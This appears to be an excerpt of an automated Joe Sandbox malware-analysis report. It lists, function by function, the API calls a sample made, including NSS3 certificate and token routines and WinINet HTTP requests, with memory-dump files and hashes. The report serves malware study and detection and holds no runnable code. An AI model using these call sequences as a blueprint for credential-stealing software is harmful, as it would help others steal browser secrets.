                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1441289343-0
                                                                                                                                                                                          • Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                                                                                                          • Instruction ID: cfecec9460557443c6b8fc1eada8883144e59ca2d3abb4d5878ae68aa4926798
                                                                                                                                                                                          • Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8221F571E003918BEB00CF969D457BF36646BD134CF114269DD0C5B642F7B1DA998292
                                                                                                                                                                                          Function 6C55ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CERT_NewCertList.NSS3 ref: 6C55ACC2
                                                                                                                                                                                            • Part of subcall function 6C532F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C532F0A
                                                                                                                                                                                            • Part of subcall function 6C532F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C532F1D
                                                                                                                                                                                            • Part of subcall function 6C532AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C530A1B,00000000), ref: 6C532AF0
                                                                                                                                                                                            • Part of subcall function 6C532AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C532B11
                                                                                                                                                                                          • CERT_DestroyCertList.NSS3(00000000), ref: 6C55AD5E
                                                                                                                                                                                            • Part of subcall function 6C5757D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C53B41E,00000000,00000000,?,00000000,?,6C53B41E,00000000,00000000,00000001,?), ref: 6C5757E0
                                                                                                                                                                                            • Part of subcall function 6C5757D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C575843
                                                                                                                                                                                          • CERT_DestroyCertList.NSS3(?), ref: 6C55AD36
                                                                                                                                                                                            • Part of subcall function 6C532F50: CERT_DestroyCertificate.NSS3(?), ref: 6C532F65
                                                                                                                                                                                            • Part of subcall function 6C532F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C532F83
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C55AD4F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 132756963-0
                                                                                                                                                                                          • Opcode ID: e123c11a86db265ae3ef3e73b5a1dd88c49470f46898e512cad9c512018e734d
                                                                                                                                                                                          • Instruction ID: e5d199e8a93be4038444bc8f0541e8e9295b1869e52a798d3ae1df7b29decc1a
                                                                                                                                                                                          • Opcode Fuzzy Hash: e123c11a86db265ae3ef3e73b5a1dd88c49470f46898e512cad9c512018e734d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3121D1B1D00214DBEB10EFA4DC454EEB7B4AF45208F85402AD8087B601FB31AE69CBF5
                                                                                                                                                                                          Function 6C58ECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C58F0AD,6C58F150,?,6C58F150,?,?,?), ref: 6C58ECBA
                                                                                                                                                                                            • Part of subcall function 6C590FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5387ED,00000800,6C52EF74,00000000), ref: 6C591000
                                                                                                                                                                                            • Part of subcall function 6C590FF0: PR_NewLock.NSS3(?,00000800,6C52EF74,00000000), ref: 6C591016
                                                                                                                                                                                            • Part of subcall function 6C590FF0: PL_InitArenaPool.NSS3(00000000,security,6C5387ED,00000008,?,00000800,6C52EF74,00000000), ref: 6C59102B
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C58ECD1
                                                                                                                                                                                            • Part of subcall function 6C5910C0: TlsGetValue.KERNEL32(?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C5910F3
                                                                                                                                                                                            • Part of subcall function 6C5910C0: EnterCriticalSection.KERNEL32(?,?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C59110C
                                                                                                                                                                                            • Part of subcall function 6C5910C0: PL_ArenaAllocate.NSS3(?,?,?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C591141
                                                                                                                                                                                            • Part of subcall function 6C5910C0: PR_Unlock.NSS3(?,?,?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C591182
                                                                                                                                                                                            • Part of subcall function 6C5910C0: TlsGetValue.KERNEL32(?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C59119C
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C58ED02
                                                                                                                                                                                            • Part of subcall function 6C5910C0: PL_ArenaAllocate.NSS3(?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C59116E
                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C58ED5A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2957673229-0
                                                                                                                                                                                          • Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                                                          • Instruction ID: 302f144accf716dc78d200a118a50566d9608cfcf7657fc1a5b86479b913b875
                                                                                                                                                                                          • Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E21D4B59027929BE700CF25DD44B52B7E4BFE5308F15C219E81C8B662E7B0E994C6D0
                                                                                                                                                                                          Function 6C5BEDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C5A7FFA,?,6C5A9767,?,8B7874C0,0000A48E), ref: 6C5BEDD4
                                                                                                                                                                                          • realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C5A7FFA,?,6C5A9767,?,8B7874C0,0000A48E), ref: 6C5BEDFD
                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?,00000000,00000000,6C5A7FFA,?,6C5A9767,?,8B7874C0,0000A48E), ref: 6C5BEE14
                                                                                                                                                                                            • Part of subcall function 6C590BE0: malloc.MOZGLUE(6C588D2D,?,00000000,?), ref: 6C590BF8
                                                                                                                                                                                            • Part of subcall function 6C590BE0: TlsGetValue.KERNEL32(6C588D2D,?,00000000,?), ref: 6C590C15
                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,6C5A9767,00000000,00000000,6C5A7FFA,?,6C5A9767,?,8B7874C0,0000A48E), ref: 6C5BEE33
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3903481028-0
                                                                                                                                                                                          • Opcode ID: 4a6e38a3ac2a46d1ae5ca07b99639daa24626d72359264f7ca6c95f6b316ecdd
                                                                                                                                                                                          • Instruction ID: ed325537a7341722bc5178afc89cc6f696de443ab074a2863baab749f7b2a4e7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a6e38a3ac2a46d1ae5ca07b99639daa24626d72359264f7ca6c95f6b316ecdd
                                                                                                                                                                                          • Instruction Fuzzy Hash: CC11C6B1A00706AFEB109E65DCD4B06BBA8EF0435DF284575F919E6A00E3B1F864C7E5
                                                                                                                                                                                          Function 6C42B4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6C42B4F5
                                                                                                                                                                                          • AcquireSRWLockExclusive.KERNEL32(6C49F4B8), ref: 6C42B502
                                                                                                                                                                                          • ReleaseSRWLockExclusive.KERNEL32(6C49F4B8), ref: 6C42B542
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C42B578
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2047719359-0
                                                                                                                                                                                          • Opcode ID: 6f3a0968b8766c296856cee8b422132dd7cc2bfa73a18601859aca027d65197a
                                                                                                                                                                                          • Instruction ID: 0d5eb07752eb576464334ad899130e0fc931fb6c042865b021f0255dbf711827
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f3a0968b8766c296856cee8b422132dd7cc2bfa73a18601859aca027d65197a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8511F030904B50C7D721CF29C800F65B3B1FFE6329F10970AE84A56A01EBB4B1D1C780
                                                                                                                                                                                          Function 6C558DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 284873373-0
                                                                                                                                                                                          • Opcode ID: 6c5680df5a7e8ffd99daa024df6b25300dd1b5dacf161cd096446efcce00c1d0
                                                                                                                                                                                          • Instruction ID: ef5f46993cbb2d96a16cb9f79690dfa1d772dcffad28fd4ee367a1c5d7e8f5f1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c5680df5a7e8ffd99daa024df6b25300dd1b5dacf161cd096446efcce00c1d0
                                                                                                                                                                                          • Instruction Fuzzy Hash: B0118C71A05A019BD700BF38C8885AABBF4FF45314F41492ADC89D7B00EB30E8A4CBD6
                                                                                                                                                                                          Function 6C5DAC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C5C5F17,?,?,?,?,?,?,?,?,6C5CAAD4), ref: 6C5DAC94
                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C5C5F17,?,?,?,?,?,?,?,?,6C5CAAD4), ref: 6C5DACA6
                                                                                                                                                                                          • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C5CAAD4), ref: 6C5DACC0
                                                                                                                                                                                          • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C5CAAD4), ref: 6C5DACDB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: free$DestroyFreeK11_Monitor
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3989322779-0
                                                                                                                                                                                          • Opcode ID: a1c0f50ee64d3332e53cb549c7ed3159a2304ead26034caaa028bdff96f4347f
                                                                                                                                                                                          • Instruction ID: af7bb900698cd4178b4674b2bc4465ca3f70ed20b85b09cd4d68cd2ac72aad27
                                                                                                                                                                                          • Opcode Fuzzy Hash: a1c0f50ee64d3332e53cb549c7ed3159a2304ead26034caaa028bdff96f4347f
                                                                                                                                                                                          • Instruction Fuzzy Hash: E7018CB1601B01ABE720DF3AED48743B7E8BF10669B004839E85AC3A10E735F458CBA5
                                                                                                                                                                                          Function 00030CC0 Relevance: 6.0, APIs: 4, Instructions: 39memorytimeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,000565B6,?,?,?), ref: 00030CD8
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00030CDF
                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 00030CEB
                                                                                                                                                                                          • wsprintfA.USER32 ref: 00030D16
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1243822799-0
                                                                                                                                                                                          • Opcode ID: e50d2586b9b75ef63fc87f8a58c07bcc6467bc7413c540c3125aa1d8391bf287
                                                                                                                                                                                          • Instruction ID: 703a1d7532421ea345d0ebe329c6d7522436df8023c64ab45d448d4cae8c1b65
                                                                                                                                                                                          • Opcode Fuzzy Hash: e50d2586b9b75ef63fc87f8a58c07bcc6467bc7413c540c3125aa1d8391bf287
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CF0E1A5900118BBDB50AFE5AD09ABF77BCEB0C715F410096F945E6190E6389A80D771
                                                                                                                                                                                          Function 00032166 Relevance: 6.0, APIs: 4, Instructions: 34fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileA.KERNEL32(00034FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00034FAC,?), ref: 00032181
                                                                                                                                                                                          • GetFileSizeEx.KERNEL32(00000000,00034FAC,?,?,?,00034FAC,?), ref: 00032199
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00034FAC,?), ref: 000321A4
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00034FAC,?), ref: 000321AC
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseFileHandle$CreateSize
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4148174661-0
                                                                                                                                                                                          • Opcode ID: 7a7e38dd80ee763f367b6025e5460fbce9cfebce200e0e4a580ad194746cf5a5
                                                                                                                                                                                          • Instruction ID: 0e99a561e0ada54a15e9ca67feb041695e4969ac3370b9e3eba024059e0830c2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a7e38dd80ee763f367b6025e5460fbce9cfebce200e0e4a580ad194746cf5a5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7CF0A731601214FBFB2197A0FD1DFDE7A6CEB18760F210150FA01BA1D0D7706A8086B0
                                                                                                                                                                                          Function 6C64CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalDeleteSectionfree
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2988086103-0
                                                                                                                                                                                          • Opcode ID: be0414748436e4af30021e713b8597f3f66605d2d30b16dfa6898cc151e3b4da
                                                                                                                                                                                          • Instruction ID: 97e3c4fe79b67bb3635c39cadce2862d8d8e554233d01dff52f6d9e2b0b61736
                                                                                                                                                                                          • Opcode Fuzzy Hash: be0414748436e4af30021e713b8597f3f66605d2d30b16dfa6898cc151e3b4da
                                                                                                                                                                                          • Instruction Fuzzy Hash: ADE03076701609BBCB10EFA9DC84C8677ACEE4A6707150625E692C3700D236F905CBA5
                                                                                                                                                                                          Function 00032BF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124processCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 00025237: GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0002527E
                                                                                                                                                                                            • Part of subcall function 00025237: RtlAllocateHeap.NTDLL(00000000), ref: 00025285
                                                                                                                                                                                            • Part of subcall function 00025237: InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 000252A7
                                                                                                                                                                                            • Part of subcall function 00025237: StrCmpCA.SHLWAPI(?), ref: 000252C1
                                                                                                                                                                                            • Part of subcall function 00025237: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000252F1
                                                                                                                                                                                            • Part of subcall function 00025237: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00025330
                                                                                                                                                                                            • Part of subcall function 00025237: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00025360
                                                                                                                                                                                            • Part of subcall function 00025237: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0002536B
